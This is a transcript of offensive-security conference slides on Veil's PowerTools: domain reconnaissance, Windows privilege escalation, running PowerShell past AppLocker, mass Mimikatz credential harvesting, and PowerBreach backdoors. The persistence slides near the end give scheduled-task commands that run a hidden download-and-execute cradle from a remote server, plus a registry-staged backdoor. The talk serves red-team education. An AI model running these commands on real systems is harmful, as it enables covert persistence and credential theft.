SlideShare a Scribd company logo
1 of 51
Drilling Deeper
with
Veil’s PowerTools
Justin Warner, Will Schroeder
Veris Group’s Adaptive Threat Division
@sixdub
◎Pentester and red teamer for the
Adaptive Threat Division of Veris Group
◎Lots of interest: red team ops, reverse
engineering, adversarial tactics, etc
◎Developer on the Veil-Framework and
co-founder of Veil’s PowerTools
@harmj0y
◎Security researcher and red teamer for
the Adaptive Threat Division of Veris
Group
◎Co-founder of the Veil-Framework and
founder of Veil’s PowerTools
◎Cons: Shmoocon, CarolinaCon, Defcon,
Derbycon, various BSides
tl;dr
◎Introduction
◎PowerView
◎PowerUp
◎PowerPick
◎PewPewPew
◎PowerBreach
◎Dear M$
◎Demos
◎Questions
Introduction
How We Got Here
The Veil-Framework
◎An offensive toolkit aimed at bridging the
gap between pentesting and red teaming
capabilities
◎Started with the release of Veil-Evasion
○ expanded with Catapult, Pillage, and
PowerView
◎CarolinaCon 2014 - “The Veil-
Framework”
Veil’s PowerTools
◎All of our offensive PowerShell work
from the Veil-Framework (and other
projects) was pulled into the new
PowerTools repo
◎PowerTools will remain the primary
source for all PowerShell work, with the
Veil repo containing offensive Python
projects
Sidenote:
Why PowerShell
○ PowerShell provides (out of the box):
□ Full .NET access
□ application whitelisting
□ direct access to the Win32 API
□ ability to execute purely in memory
□ default installation Win7+ !
○ “Why I Choose PowerShell as an Attack
Platform”
□ http://www.exploit-monday.com/2012/08/Why-I-
Choose-PowerShell.html
“Bad Guys”
“
“Microsoft’s Post-Exploitation
Language”
PowerShell:
-@obscuresec
PowerView
Domain Situational
Awareness
◎Think dsquery on steroids... and cocaine
◎First started because a client banned
“net” commands on domain machines
◎Otherwise initially inspired by Rob
Fuller’s netview.exe tool
○ Wanted something more flexible that also didn’t
drop a binary to disk
Background
User Hunting
◎Goal: find which domain machines
specific users are logged into
◎Invoke-UserHunter: finds where target
users or group members are logged into
on the network
◎Invoke-StealthUserHunter: extracts
user homeDirectories from AD, gets
sessions on all these file servers to hunt
for targets
○ Significantly less traffic than Invoke-UserHunter
Offensive Event Parsing
◎Once you get DA, domain controller
event logs make it trivial to track down
user locations
◎PowerView’s Get-UserLogonEvents
lets you easily extract account logon
events (4624) from a host
◎Invoke-UserEventHunter wraps this all
up into a weaponized form
Domain Trusts
◎PowerView can now enumerate and
exploit existing domain trusts:
○ Get-NetDomainTrusts, Get-NetForestDomains
◎Most PowerView functions now accept a
“-Domain <name>” flag, allowing them to
operate across trusts
○ e.g. Get-NetUsers –Domain sub.test.local
◎Invoke-MapDomainTrusts can
recursively map all reachable trusts from
a foothold
Data Mining
◎PowerView’s Invoke-ShareFinder -
CheckAccess can find all shares
readable by the current user
◎Invoke-FileFinder can search a network
for open file shares, or take a share list
from Invoke-ShareFinder
◎Spits out a .csv of found files, sortable by
creation or last access times
PowerUp
Automating Windows
Privesc
Background
◎On past assessments, had to escalate
privileges on a locked down workstation
◎Kernel exploits wouldn’t work, so fell
back to vulnerable service binaries
◎More or less did everything manually,
wanted something a bit easier
○ Started implementing the “Encyclopedia of
Privesc”
Windows Services
◎One of the most effective escalation
vectors was (and still is) vulnerable
Windows services
○ Sometimes can modify a service itself
○ Get-ServicePerms will check for these
◎However, many organizations overlook
the permissions for service binaries :)
○ Use Get-ServiceEXEPerms, then overwrite the
service binary to add a local user or install an
agent
.DLL Hijacking
◎Many programs/services will search in
multiple locations when loading,
including directories listed in the PATH
environment variable
◎If you have write access to any folder in
PATH, there’s a good chance you can
drop a malicious DLL and escalate
privileges
○ Invoke-FindPathHijack will search for these
opportunities
PowerUp
◎Automates everything we’ve talked
about, and more
◎Invoke-AllChecks will run all current
checks against a host
◎Functions exist to abuse most of the
escalation vectors found
PowerPick
Lock Picking the
AppLocker
Background
◎ Incident responders are recognizing and
targeting PowerShell.exe
○ Had a client write HIPS rules against
psh_psexec, YA, for reals
◎ We wanted to be prepared for more
situations like this
◎ Developed PowerPick as a combination of
solutions to run PowerShell without
powershell.exe
Bypassing the Blacklist
◎ Used assemblies in .NET/C# to execute code
○ System.Management.Automation
◎ Developed SharpPick
○ http://www.sixdub.net/2014/12/02/inexorable-
powershell-a-red-teamers-tale-of-overcoming-
simple-applocker-policies/
◎ To defeat with blacklist policy (not ideal), must
permission off or block DLLs in the Global
Assembly Cache (GAC)
○ C:WindowsAssembly*
OH BTW
Runspaces in Unmanaged Code
◎SharpPick wasn’t very sexy
○ Binary on disk = Lame!
◎Lee Christensen (@tifkin_) authored
“UnmanagedPowerShell” to utilize .NET
assemblies from C
○ Uses CLR and custom .NET assembly in memory
○ https://github.com/leechristensen/UnmanagedPo
werShell
◎Transformed this code into a reflective
DLL = ReflectivePick
PowerShell Inception = Injection!!
◎Decided it needed more PowerShell
◎Embedded ReflectivePick into Invoke-
ReflectivePEInjection from Powersploit
by @josephbialek
○ Created Invoke-PSInjector
◎Injects DLL into remote process that
runs PowerShell code
ReflectivePick Diagram
*.exe
Invoke-PSInjector
ReflectivePick
.NET Assembly
Download Cradle
Invoke-PowerCeption?
PewPewPew
Launching Lazerz at
your Targets
Invoke-Mass*
◎Model to run PowerShell scripts on a
mass number of machines and retrieve
results:
1. A jobbified webserver is kicked off in the
background which serves out a specified
PowerShell file
2. A IEX() one-liner is executed on machines
through WMI to download/executed the
hosted code
3. Results are POSTed back to the local
webserver
Invoke-MassMimikatz
◎Executes PowerSploit’s Invoke-
Mimikatz on multiple machines without
PSRemoting
◎Raw Mimikatz results are saved on the
pivot host
◎Result files are parsed and
Server:Credential objects are output to
the pipeline
Invoke-MassMimikatz
Invoke-MassSearch
◎Microsoft has another gift for attackers,
the Windows Search Indexing Service
○ Why search through all of a system’s file when
Windows does this for you?
◎Invoke-MassSearch performs the same
pattern as Invoke-MassMimikatz
○ allows you to query the search indexer across
machines where you have admin access
PowerBreach
New Release
Background
◎One obvious gap remaining in workflow
of Veil PowerTools
◎Motivation: offense in depth theory
◎Wanted multiple easy ways to remain
resident on the compromised systems
○ Memory only
PowerBreach
◎Yes… More PowerShell
○ Why not utilize our favorite scripting language?!
◎Goal: automate a bunch of
techniques/tools to backdoor a system
◎Multiple triggers, various host/network
signatures
○ We will show some of the “cool” ones
Invoke-EventLogBackdoor
◎Based on Shmoocon 2013 “Wipe The
Drive” by Jake Williams
(@MalwareJake)
◎Uses Get-WinEvent to monitor windows
event logs for failed RDP attempts
◎When it recognizes “trigger” username,
phones home to attacker
○ With an IEX(...) download cradle
Invoke-PortKnockBackdoor
◎Based upon Get-Packet by Robbie
Foust http://blog.robbiefoust.com/?p=68
○ Uses system.net.sockets.socket to create raw
socket
○ Uses socket.iocontrol to make promiscuous
◎Promiscuously sniffs traffic on system
and inspects data for “magic” trigger
value
○ UDP, TCP, ICMP
Invoke-DeadUserBackdoor
◎Common action of attackers is to add
domain/local users
◎Uses ADSI to monitor for a users
existence
◎If the user is not found, assumes the
worst and phones home
Invoke-ResolverBackdoor
◎Attempts to be a little stealthier and
usable on external assessments
◎Resolves specified DNS name on
interval and if the resolution doesn’t
equal a predefined IP...
◎… PHONE HOME TO THAT IP!
Persistence… If you must
◎Focuses more on non-persistent
backdoors
◎Schedule tasks seem to work really well
for PowerShell in domain networks
schtasks /create /tn OfficeUpdater /tr
"powershell.exe -w hidden -NonI -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://server/scri
pt.ps1'''))'" /sc onlogon /ru System
Registry Storage
◎Better yet, stage your script in the registry!
$backdoor = "write-host 123”
Set-ItemProperty -Path 'HKLM:HARDWARE' -Name
'secret' -Value $backdoor
schtasks /create /tn Updater /tr "powershell -c 'IEX (gp
HKLM:HARDWARE secret).secret'" /sc onlogon /ru
System
So what?
◎Nothing revolutionary here!
◎Nothing worse than owning a system
and not being able to get back on later!
◎Real power comes when combining
PowerTools
○ PewPewPew with PowerBreach
2 Cents
Almost ready for the show!
Obligatory Defense Slide
◎HIPs and Whitelisting generally help
endpoint defense
◎Enterprise incident response capabilities
○ Memory only capabilities but scripts (“malware”)
able to be easily recovered and analyzed
◎Need a clear way to restrict PowerShell
& .NET assemblies to certain users
True Story…
Demos
Questions?
◎Justin
○ @sixsub
○ http://www.sixdub.net/
○ justin [at] sixdub.net
◎Will
○ @harmj0y
○ http://blog.harmj0y.net/
○ will [at] harmj0y.net
◎https://github.com/veil-framework/PowerTools

More Related Content

What's hot

Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Alexander Polce Leary
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияPositive Hack Days
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
Keybase Vault Auto-Unseal HashiTalks2020
Keybase Vault Auto-Unseal HashiTalks2020Keybase Vault Auto-Unseal HashiTalks2020
Keybase Vault Auto-Unseal HashiTalks2020Bas Meijer
 
BloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryBloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryAndy Robbins
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...Andrey Devyatkin
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conWill Schroeder
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 

What's hot (20)

Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 
Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017Building Better Backdoors with WMI - DerbyCon 2017
Building Better Backdoors with WMI - DerbyCon 2017
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Как мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управленияКак мы взломали распределенные системы конфигурационного управления
Как мы взломали распределенные системы конфигурационного управления
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
Keybase Vault Auto-Unseal HashiTalks2020
Keybase Vault Auto-Unseal HashiTalks2020Keybase Vault Auto-Unseal HashiTalks2020
Keybase Vault Auto-Unseal HashiTalks2020
 
BloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryBloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active Directory
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...
2020-02-20 - HashiTalks 2020 - HashiCorp Vault configuration as code via Hash...
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 

Viewers also liked

Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellEnclaveSecurity
 
Adversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the ProsAdversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the Prossixdub
 
An Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsAn Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsEnclaveSecurity
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsNikhil Mittal
 
BriMor Labs Live Response Collection
BriMor Labs Live Response CollectionBriMor Labs Live Response Collection
BriMor Labs Live Response CollectionBriMorLabs
 
Countering the Cyber Threat
Countering the Cyber ThreatCountering the Cyber Threat
Countering the Cyber ThreatOllie Whitehouse
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Minions
MinionsMinions
Minionssixdub
 
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?Anthony Melfi
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Eric Romang
 

Viewers also liked (20)

Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShell
 
Adversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the ProsAdversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the Pros
 
An Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security AssessmentsAn Introduction to PowerShell for Security Assessments
An Introduction to PowerShell for Security Assessments
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
 
BriMor Labs Live Response Collection
BriMor Labs Live Response CollectionBriMor Labs Live Response Collection
BriMor Labs Live Response Collection
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Countering the Cyber Threat
Countering the Cyber ThreatCountering the Cyber Threat
Countering the Cyber Threat
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Minions
MinionsMinions
Minions
 
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?
bsides NOVA 2017 So You Want to Be a Cyber Threat Analyst eh?
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1
 

Similar to Drilling deeper with Veil's PowerTools

Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
Kubernetes Summit 2019 - Harden Your Kubernetes Cluster
Kubernetes Summit 2019 - Harden Your Kubernetes ClusterKubernetes Summit 2019 - Harden Your Kubernetes Cluster
Kubernetes Summit 2019 - Harden Your Kubernetes Clustersmalltown
 
Docker 1.9 Feature Overview
Docker 1.9 Feature OverviewDocker 1.9 Feature Overview
Docker 1.9 Feature OverviewSreenivas Makam
 
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfChristopher Doman
 
DCSF 19 Building Your Development Pipeline
DCSF 19 Building Your Development Pipeline  DCSF 19 Building Your Development Pipeline
DCSF 19 Building Your Development Pipeline Docker, Inc.
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
VMware@Night Container and Virtualization
VMware@Night Container and VirtualizationVMware@Night Container and Virtualization
VMware@Night Container and VirtualizationOpvizor, Inc.
 
VMware@Night: Container & Virtualisierung
VMware@Night: Container & VirtualisierungVMware@Night: Container & Virtualisierung
VMware@Night: Container & VirtualisierungDigicomp Academy AG
 
Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Wellington Silva
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
Swarm: Native Docker Clustering
Swarm: Native Docker ClusteringSwarm: Native Docker Clustering
Swarm: Native Docker ClusteringRoyee Tager
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Michael Boelen
 
Using Docker For Development
Using Docker For DevelopmentUsing Docker For Development
Using Docker For DevelopmentLaura Frank Tacho
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
Тарас Кирилюк — Docker basics. How-to for Drupal developers
Тарас Кирилюк — Docker basics. How-to for Drupal developersТарас Кирилюк — Docker basics. How-to for Drupal developers
Тарас Кирилюк — Docker basics. How-to for Drupal developersLEDC 2016
 
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...Puppet
 
Challenges of container configuration
Challenges of container configurationChallenges of container configuration
Challenges of container configurationlutter
 
DCEU 18: Developing with Docker Containers
DCEU 18: Developing with Docker ContainersDCEU 18: Developing with Docker Containers
DCEU 18: Developing with Docker ContainersDocker, Inc.
 

Similar to Drilling deeper with Veil's PowerTools (20)

Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Kubernetes Summit 2019 - Harden Your Kubernetes Cluster
Kubernetes Summit 2019 - Harden Your Kubernetes ClusterKubernetes Summit 2019 - Harden Your Kubernetes Cluster
Kubernetes Summit 2019 - Harden Your Kubernetes Cluster
 
Docker 1.9 Feature Overview
Docker 1.9 Feature OverviewDocker 1.9 Feature Overview
Docker 1.9 Feature Overview
 
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdfThe Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
The Ultimate Guide to Docker & Kubernetes Forensics and Incident Response.pdf
 
DCSF 19 Building Your Development Pipeline
DCSF 19 Building Your Development Pipeline  DCSF 19 Building Your Development Pipeline
DCSF 19 Building Your Development Pipeline
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
VMware@Night Container and Virtualization
VMware@Night Container and VirtualizationVMware@Night Container and Virtualization
VMware@Night Container and Virtualization
 
VMware@Night: Container & Virtualisierung
VMware@Night: Container & VirtualisierungVMware@Night: Container & Virtualisierung
VMware@Night: Container & Virtualisierung
 
Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Swarm: Native Docker Clustering
Swarm: Native Docker ClusteringSwarm: Native Docker Clustering
Swarm: Native Docker Clustering
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The Cloud
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackers
 
Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?
 
Using Docker For Development
Using Docker For DevelopmentUsing Docker For Development
Using Docker For Development
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Тарас Кирилюк — Docker basics. How-to for Drupal developers
Тарас Кирилюк — Docker basics. How-to for Drupal developersТарас Кирилюк — Docker basics. How-to for Drupal developers
Тарас Кирилюк — Docker basics. How-to for Drupal developers
 
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...
PuppetConf 2016: The Challenges with Container Configuration – David Lutterko...
 
Challenges of container configuration
Challenges of container configurationChallenges of container configuration
Challenges of container configuration
 
DCEU 18: Developing with Docker Containers
DCEU 18: Developing with Docker ContainersDCEU 18: Developing with Docker Containers
DCEU 18: Developing with Docker Containers
 

More from Will Schroeder

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
